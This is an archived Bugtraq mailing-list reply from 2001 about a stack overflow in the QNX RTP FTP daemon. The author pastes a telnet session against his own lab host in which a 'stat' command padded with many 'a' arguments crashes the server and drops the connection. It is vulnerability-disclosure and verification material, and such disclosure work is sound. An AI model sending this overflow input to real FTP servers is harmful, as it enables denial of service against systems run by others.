[18986] in bugtraq

home help back first fref pref prev next nref lref last post

Re: QNX RTP ftpd stack overflow

daemon@ATHENA.MIT.EDU (Przemyslaw Frasunek)
Sat Feb 3 18:43:55 2001

Mail-Followup-To: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>,
                  bugtraq@securityfocus.com, Ted U <tedu@HEOROT.STANFORD.EDU>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Message-Id:  <20010203092253.C675@riget.scene.pl>
Date:         Sat, 3 Feb 2001 09:22:53 +0100
Reply-To: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
From: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <Pine.BSO.4.31.0102021504420.8713-100000@heorot.stanford.edu>;
              from tedu@HEOROT.STANFORD.EDU on Fri, Feb 02,
              2001 at 03:08:12PM -0800

On Fri, Feb 02, 2001 at 03:08:12PM -0800, Ted U wrote:
> tested on qnx rtp as released on jan. 18 from get.qnx.com.  doesn't work.
> i tried significantly more a's and nothing happens.  i get the normal
> repsonse from stat.

Are you sure? This is output from the same version of QNX RTP, downloaded
yesterday from get.qnx.com:

riget:venglin:~> telnet cipsko 21
Trying 192.168.1.32...
Connected to cipsko.gadaczka.org.
Escape character is '^]'.
220 cipsko FTP server (Version 5.60) ready.
user venglin
331 Password required for venglin.
pass x
230 User venglin logged in.
stat a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
Connection closed by foreign host.

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *
home help back first fref pref prev next nref lref last post